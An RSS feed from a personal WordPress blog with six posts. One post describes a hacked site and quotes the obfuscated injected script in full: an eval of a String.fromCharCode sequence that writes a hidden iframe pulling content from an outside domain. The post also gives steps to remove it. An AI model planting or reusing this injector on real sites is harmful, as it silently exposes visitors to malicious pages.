<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Crumpled Notebook&#187; wordpress</title>
	<atom:link href="http://crumplednotebook.com/tag/wordpress/feed/" rel="self" type="application/rss+xml" />
	<link>http://crumplednotebook.com</link>
	<description>&#34;The crumpled up notes of my life.&#34;</description>
	<lastBuildDate>Fri, 03 Feb 2012 00:53:26 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>My WordPress Got Hacked</title>
		<link>http://crumplednotebook.com/wordpress-hacked/</link>
		<comments>http://crumplednotebook.com/wordpress-hacked/#comments</comments>
		<pubDate>Sat, 06 Jun 2009 21:13:47 +0000</pubDate>
		<dc:creator>mf</dc:creator>
				<category><![CDATA[Tech]]></category>
		<category><![CDATA[avast]]></category>
		<category><![CDATA[ftp]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/?p=1018</guid>
		<description><![CDATA[So I discovered today that some of my WordPress sites had been hacked. It was alerting my anti-virus software, Avast, that I had a virus in the form of an iFrame. They were all ones that had the same FTP login, which I quickly changed once I realized. I&#8217;ve fixed the problem here, and am [...]
No related posts.]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fcrumplednotebook.com%2Fwordpress-hacked%2F' data-shr_title='My+WordPress+Got+Hacked'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fcrumplednotebook.com%2Fwordpress-hacked%2F' data-shr_title='My+WordPress+Got+Hacked'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetTop Automatic --><p>So I discovered today that some of my <a title="WordPress" href="http://www.wordpress.org">WordPress</a> sites had been hacked. It was alerting my anti-virus software, <a title="Avast Home Edition" href="http://avast.com/eng/download-avast-home.html">Avast</a>, that I had a virus in the form of an iFrame. They were all ones that had the same FTP login, which I quickly changed once I realized. I&#8217;ve fixed the problem here, and am not off to fix the other sites. The two files that seem to be hacked are your index.php located in the root of your domain. The other is index.php located in wp-content.</p>
<p>It&#8217;s a javascript string that reads:</p>
<blockquote><p>? php echo &#8216;&lt;script type=&#8221;text/javascript&#8221;&gt;eval(String.fromCharCode(102,117,110,99,116,105,<br />
111,110,32,100,57,56,100,40,41,123,118,97,114,32,115,100,49,55,55,50,61,<br />
49,50,51,43,51,50,52,59,125,118,97,114,32,103,104,103,52,53,61,34,115,<br />
34,59,118,97,114,32,119,61,34,117,112,116,117,108,108,111,103,34,59,<br />
118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,<br />
34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,<br />
114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,<br />
46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,<br />
39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,<br />
53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,<br />
39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,<br />
104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,<br />
43,39,114,39,43,39,97,39,43,39,109,101,62,39,41,59,32,102,117,110,<br />
99,116,105,111,110,32,102,57,57,102,40,41,123,118,97,114,32,115,55,<br />
97,56,56,115,61,57,55,43,55,53,59,125,32,118,97,114,32,115,102,<br />
55,115,61,49,50,51))&lt;/script&gt;&#8217;; ?</p></blockquote>
<p>If you&#8217;re having this problem, first change your FTP password, WordPress passwords and anything else that could have been compromised.</p>
<p>FTP into your site and check the content of the above listed to files to make sure they have been indeed infected. If so open them up in a text editor and delete the above script. The entire index.php file in the root should read:</p>
<blockquote><p>&lt;?php<br />
/**<br />
* Front to the WordPress application. This file doesn&#8217;t do anything, but loads<br />
* wp-blog-header.php which does and tells WordPress to load the theme.<br />
*<br />
* @package WordPress<br />
*/</p>
<p>/**<br />
* Tells WordPress to load the WordPress theme and output it.<br />
*<br />
* @var bool<br />
*/<br />
define(&#8216;WP_USE_THEMES&#8217;, true);</p>
<p>/** Loads the WordPress Environment and Template */<br />
require(&#8216;./wp-blog-header.php&#8217;);<br />
?&gt;</p></blockquote>
<p>and the entire index.php file located in wp-content should just read:</p>
<blockquote><p>&lt;?php<br />
// Silence is golden.<br />
?&gt;</p></blockquote>
<p>Make the change and upload them back to the right spot and it should work. If you have questions about this, feel free to leave a comment and I&#8217;ll be glad to help out. This is what fixed my site. It should work on yours if you are having the same problem, but I can&#8217;t guarantee.</p>
<div class="shr-publisher-1018"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><!-- End Shareaholic LikeButtonSetBottom Automatic --><p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/wordpress-hacked/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Debating in the WordPress community</title>
		<link>http://crumplednotebook.com/debating-in-the-wordpress-community/</link>
		<comments>http://crumplednotebook.com/debating-in-the-wordpress-community/#comments</comments>
		<pubDate>Fri, 05 Jun 2009 14:46:08 +0000</pubDate>
		<dc:creator>mf</dc:creator>
				<category><![CDATA[Tech]]></category>
		<category><![CDATA[diythemes]]></category>
		<category><![CDATA[gpl]]></category>
		<category><![CDATA[pomomusings]]></category>
		<category><![CDATA[studiopress]]></category>
		<category><![CDATA[thesis]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/?p=1014</guid>
		<description><![CDATA[There is an interesting discussion going on over at Pomomusings on this blog post Top 10 Reasons to Switch to WordPress. The article itself is a good list of why to switch to WordPress.Â  Make sure to check on the comments though where a debate begins over GPL compliant themes, whether Thesis is GPL compliant [...]
No related posts.]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fcrumplednotebook.com%2Fdebating-in-the-wordpress-community%2F' data-shr_title='Debating+in+the+WordPress+community'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fcrumplednotebook.com%2Fdebating-in-the-wordpress-community%2F' data-shr_title='Debating+in+the+WordPress+community'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetTop Automatic --><p>There is an interesting discussion going on over at Pomomusings on this blog post <a href="http://pomomusings.com/2009/06/04/switch-wordpress-blog/">Top 10 Reasons to Switch to WordPress</a>. The article itself is a good list of why to switch to WordPress.Â  Make sure to check on the comments though where a debate begins over GPL compliant themes, whether Thesis is GPL compliant or not, and whether it&#8217;s good for the WordPress Community. <a title="Matt" href="http://ma.tt">Matt Mullenweg</a> (co-founder of <a title="WordPress" href="http://www.wordpress.org">WordPress</a>), <a title="Copyblogger" href="http://www.copyblogger.com/">Brian Clark</a> (of <a title="DIY Themes" href="http://diythemes.com/">Thesis/DIY Themes</a>), and <a title="Brian Gardner" href="http://www.briangardner.com/">Brian Gardner</a> (<a title="StudioPress" href="http://www.studiopress.com/">StudioPress</a>) all weigh in.</p>
<div class="shr-publisher-1014"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><!-- End Shareaholic LikeButtonSetBottom Automatic --><p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/debating-in-the-wordpress-community/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Just playing</title>
		<link>http://crumplednotebook.com/just-playing/</link>
		<comments>http://crumplednotebook.com/just-playing/#comments</comments>
		<pubDate>Wed, 25 Feb 2009 18:53:00 +0000</pubDate>
		<dc:creator>mf</dc:creator>
				<category><![CDATA[My Life]]></category>
		<category><![CDATA[thesis]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[wp]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/personal/just-playing</guid>
		<description><![CDATA[Excuse me for the next few days maybe. I&#8217;m playing around with Thesis (new theme) so you might see different things as I start to get into it. No related posts.
No related posts.]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fcrumplednotebook.com%2Fjust-playing%2F' data-shr_title='Just+playing'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fcrumplednotebook.com%2Fjust-playing%2F' data-shr_title='Just+playing'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetTop Automatic --><p>Excuse me for the next few days maybe. I&#8217;m playing around with Thesis (new theme) so you might see different things as I start to get into it.</p>
<div class="shr-publisher-813"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><!-- End Shareaholic LikeButtonSetBottom Automatic --><p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/just-playing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SF WordCamp 2008 Presentations</title>
		<link>http://crumplednotebook.com/wordcamp-2008-presentations/</link>
		<comments>http://crumplednotebook.com/wordcamp-2008-presentations/#comments</comments>
		<pubDate>Sat, 16 Aug 2008 18:36:50 +0000</pubDate>
		<dc:creator>mf</dc:creator>
				<category><![CDATA[Tech]]></category>
		<category><![CDATA[San-Francisco]]></category>
		<category><![CDATA[sf]]></category>
		<category><![CDATA[wordcamp]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[wp]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/?p=637</guid>
		<description><![CDATA[Presentation links and downloads from SF WordCamp 2008&#8230;updated throughout the day. LOLcats &#38; the Secret of Virality &#8211;Ben Huh Open Source Business Models &#8211;Stephen O&#8217;Grady The Future of Education and WP &#8211;Alan Levine CogDogBlog &#8211;Alan Levine SEO Mistakes (PowerPoint Download) &#8211;Stephan Spencer SEO Title Tag Plugin &#8211;NetConcepts Twelve SEO Mistakes Article &#8211;Stephan Spencer NetConcepts WordPress [...]
No related posts.]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fcrumplednotebook.com%2Fwordcamp-2008-presentations%2F' data-shr_title='SF+WordCamp+2008+Presentations'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fcrumplednotebook.com%2Fwordcamp-2008-presentations%2F' data-shr_title='SF+WordCamp+2008+Presentations'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetTop Automatic --><p>Presentation links and downloads from SF WordCamp 2008&#8230;updated throughout the day.</p>
<p><a href="http://icanlol.com/ichc-wordcamp.pdf">LOLcats &amp; the Secret of Virality</a> &#8211;Ben Huh</p>
<p><a href="http://redmonk.com/public/wordcamp.pdf">Open Source Business Models</a> &#8211;Stephen O&#8217;Grady</p>
<p><a href="http://flickr.com/photos/cogdog/sets/72157606734821164/">The Future of Education and WP</a> &#8211;Alan Levine</p>
<p><a href="http://cogdogblog.com/">CogDogBlog</a> &#8211;Alan Levine</p>
<p><a href="http://www.netconcepts.com/learn/seo-mistakes.ppt">SEO Mistakes</a> (PowerPoint Download) &#8211;Stephan Spencer</p>
<p><a href="http://www.netconcepts.com/seo-title-tag-plugin/">SEO Title Tag Plugin</a> &#8211;NetConcepts</p>
<p><a href="http://searchengineland.com/070823-082758.php">Twelve SEO Mistakes Article</a> &#8211;Stephan Spencer</p>
<p><a href="http://www.netconcepts.com/">NetConcepts</a></p>
<p><a href="http://tantek.com/presentations/2008/08/wordpress-microformats/">WordPress &amp; Microformats: Past, Present, Future</a> &#8211;Tantek Celik</p>
<p><a href="http://www.slideshare.net/apeatling/buddypress-wordcamp-presentation">BuddyPress</a> &#8211;Andy Peatling</p>
<p><a href="http://dev.gigaom.com/">Om Malik</a></p>
<p><a href="http://demo.talkpress.de/crazyhorse/">Crazyhorse Demo</a> &#8211;Liz Danzico &amp; Janes Wells</p>
<div class="shr-publisher-637"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><!-- End Shareaholic LikeButtonSetBottom Automatic --><p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/wordcamp-2008-presentations/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordCamp SF</title>
		<link>http://crumplednotebook.com/wordcamp-sf/</link>
		<comments>http://crumplednotebook.com/wordcamp-sf/#comments</comments>
		<pubDate>Fri, 15 Aug 2008 15:21:36 +0000</pubDate>
		<dc:creator>mf</dc:creator>
				<category><![CDATA[My Life]]></category>
		<category><![CDATA[sf]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/?p=634</guid>
		<description><![CDATA[So I&#8217;m heading up to WordCamp tomorrow in SF for the day. It&#8217;s basically a conference for users and developers of WordPress, which is my blogging software. Hopefully I&#8217;ll learn some cool stuff. At the very least, it&#8217;ll be fun hanging out with computer/blogger people and not people who look at me funny when I [...]
No related posts.]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fcrumplednotebook.com%2Fwordcamp-sf%2F' data-shr_title='WordCamp+SF'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fcrumplednotebook.com%2Fwordcamp-sf%2F' data-shr_title='WordCamp+SF'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetTop Automatic --><p>So I&#8217;m heading up to WordCamp tomorrow in SF for the day. It&#8217;s basically a conference for users and developers of <a title="Wordpress" href="http://wordpress.org/">WordPress</a>, which is my blogging software. Hopefully I&#8217;ll learn some cool stuff. At the very least, it&#8217;ll be fun hanging out with computer/blogger people and not people who look at me funny when I talk about WordPress.</p>
<div class="shr-publisher-634"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><!-- End Shareaholic LikeButtonSetBottom Automatic --><p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/wordcamp-sf/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hello World!</title>
		<link>http://crumplednotebook.com/hello-world/</link>
		<comments>http://crumplednotebook.com/hello-world/#comments</comments>
		<pubDate>Sun, 27 Apr 2008 23:33:45 +0000</pubDate>
		<dc:creator>mf</dc:creator>
				<category><![CDATA[My Life]]></category>
		<category><![CDATA[Tech]]></category>
		<category><![CDATA[categories]]></category>
		<category><![CDATA[guy]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.crumplednotebook.com/?p=593</guid>
		<description><![CDATA[I&#8217;m back online officially. No big hurrah or anything. I have a few blogs to post up and will try to do start that tonight, but going to Santa Cruz to see Forgetting Sarah Marshall, so we&#8217;ll see how I feel when I get home. On a similarish note, for you inquiring minds, I&#8217;ve been [...]
No related posts.]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fcrumplednotebook.com%2Fhello-world%2F' data-shr_title='Hello+World%21'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fcrumplednotebook.com%2Fhello-world%2F' data-shr_title='Hello+World%21'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetTop Automatic --><p>I&#8217;m back online officially. No big hurrah or anything. I have a few blogs to post up and will try to do start that tonight, but going to Santa Cruz to see <a title="Forgetting Sarah Marshall" href="http://www.imdb.com/title/tt0800039/" target="_blank">Forgetting Sarah Marshall</a>, so we&#8217;ll see how I feel when I get home.</p>
<p>On a similarish note, for you inquiring minds, I&#8217;ve been seeing this guy named Nathan. We actually dated before. If you are curious, guy #3 here. Wow that was forever ago. Anyway, I stopped blogging about guys here for the most part, but I guess it won&#8217;t hurt too much.</p>
<p>Hm, I see an update for the new wordpress already. It says &#8220;better performance for categories.&#8221; Perhaps that will solve my biggest problem with it. That actually might make it worth coming back and updating tonight.</p>
<div class="shr-publisher-593"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><!-- End Shareaholic LikeButtonSetBottom Automatic --><p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://crumplednotebook.com/hello-world/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

